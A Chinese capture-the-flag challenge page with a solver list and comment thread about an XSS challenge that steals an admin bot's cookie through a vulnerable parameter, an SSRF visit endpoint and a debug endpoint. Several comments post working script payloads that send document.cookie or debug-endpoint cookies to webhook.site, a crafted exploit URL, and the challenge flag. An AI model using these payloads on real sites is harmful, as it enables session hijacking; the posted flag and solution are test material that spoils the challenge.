评分(0)
暂无评分
解题动态
ksw0513 攻破了该题 13小时前
地内地内地 攻破了该题 2天前
ppppppppppp 攻破了该题 4天前
asdliuyan 攻破了该题 6天前
AlexLee 攻破了该题 7天前
lywlbk 攻破了该题 7天前
bugw 攻破了该题 10天前
longsk 攻破了该题 12天前
yu8899 攻破了该题 16天前
liliy 攻破了该题 16天前
张三四 攻破了该题 17天前
京墨重楼 攻破了该题 17天前
飞梭 攻破了该题 18天前
保护级废物0.o 攻破了该题 19天前
caixinggang 攻破了该题 21天前
fenrir 攻破了该题 22天前
JLing 攻破了该题 22天前
jingxin222 攻破了该题 24天前
asdfghjkldddd 攻破了该题 26天前
评论
保护级废物0.o 19天前
举报
发现XSS漏洞 - /zombie?show= 参数未过滤,可注入JavaScript 发现SSRF - /visit 让admin bot访问指定URL(限hostname为49.232.142.230) 发现Debug端点 - /debug 返回请求头信息(含cookie) 构造XSS payload - 让admin bot访问含XSS的页面:
倦鸟叫了一整天 1年前
举报
看不到源码呀
18715082837 7月前
举报
怎么看源码
15756309355 1年前
举报
斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器
林蔓露 5月前
举报
@yearling 管理员cookie:Wow, we really liked too!
lianglllllll 8月前
举报
这个要自己搭吗?之前有道题也是没有
lunarbyside 1年前
举报
@yearling 会不会是因为网络是私网地址啊
yearling 1年前
举报
我也拿不到cookie,难绷
missa 1年前
举报
请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,
vincentshine 1年前
举报
任何一个带外网站都可以,推荐ceye
一只小羊 2年前
举报
<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>
lunarbyside 1年前
举报
接收到请求了,但是没搞懂cookie在哪里,然后干嘛呢也不知道,也没看到cookie
vincentshine 1年前
举报
感谢老哥的脚本,我用其他的windows.location.href的方式打不开
1512624649 2年前
举报
flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个
meilanzhuju 2年前
举报
有点晕乎
qingfeng1115 2年前
举报
<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a
yituoshi 2年前
举报
Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08